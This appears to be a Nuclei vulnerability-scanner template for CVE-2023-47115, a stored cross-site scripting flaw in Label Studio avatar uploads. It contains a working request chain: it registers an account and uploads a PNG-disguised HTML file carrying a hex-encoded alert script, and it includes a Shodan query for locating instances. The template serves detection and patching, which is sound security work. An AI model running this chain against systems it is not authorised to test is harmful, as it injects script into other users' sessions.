id: CVE-2023-47115 info: name: Label Studio - Cross-Site Scripting author: isacaya severity: high description: | Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website. impact: | Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. remediation: | Update to version 1.9.2. reference: - https://github.com/advisories/GHSA-q68h-xwq5-mm7x - https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49 - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26 - https://nvd.nist.gov/vuln/detail/CVE-2023-47115 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L cvss-score: 7.1 cve-id: CVE-2023-47115 cwe-id: CWE-79 metadata: verified: true max-request: 6 shodan-query: http.favicon.hash:-1649949475 tags: cve,cve2023,xss,authenticated,intrusive,label-studio http: - raw: - | GET /user/login/ HTTP/1.1 Host: {{Hostname}} - | POST /user/signup/?&next=/projects/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false - | GET /api/current-user/whoami HTTP/1.1 Host: {{Hostname}} - | POST /api/users/{{id}}/avatar/ HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF ------WebKitFormBoundarytZZRQ9D2LS0PMsHF Content-Disposition: form-data; name="avatar"; filename="nuclei.html" Content-Type: image/png {{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}} ------WebKitFormBoundarytZZRQ9D2LS0PMsHF - | GET /api/current-user/whoami HTTP/1.1 Host: {{Hostname}} - | GET {{filename}} HTTP/1.1 Host: {{Hostname}} extractors: - type: xpath name: csrftoken internal: true attribute: value xpath: - '/html/body/div/form/input' - type: json part: body name: id internal: true json: - '.id' - type: json part: body name: filename internal: true json: - '.avatar' matchers: - type: dsl dsl: - "status_code == 200" - "contains(header, 'text/html')" - 'contains(body, "")' condition: and # digest: 4a0a00473045022100aa945f4d7cfc24ccc7b7a8f60b7f6330657b9143527d8c1a0d1c30afb5798fd80220611e10519bf2fd4257bf6911993b35e94fcacb89b616f16f50b98606dda06dac:922c64590222798bb761d5b6d8e72950